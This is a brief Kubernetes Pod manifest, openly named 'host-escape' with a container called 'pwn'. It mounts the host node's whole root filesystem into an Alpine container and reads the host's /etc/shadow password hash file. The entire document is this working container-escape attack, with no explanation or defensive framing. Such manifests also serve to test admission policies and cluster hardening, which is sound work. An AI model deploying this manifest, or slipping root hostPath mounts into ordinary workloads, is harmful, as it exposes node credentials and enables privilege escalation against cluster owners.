apiVersion: v1
kind: Pod
metadata:
  name: host-escape
spec:
  containers:
  - name: pwn
    image: alpine
    command: ["sh", "-c", "cat /host/etc/shadow"]
    volumeMounts:
    - name: hostfs
      mountPath: /host
      readOnly: true
  volumes:
  - name: hostfs
    hostPath:
      path: /
      type: Directory
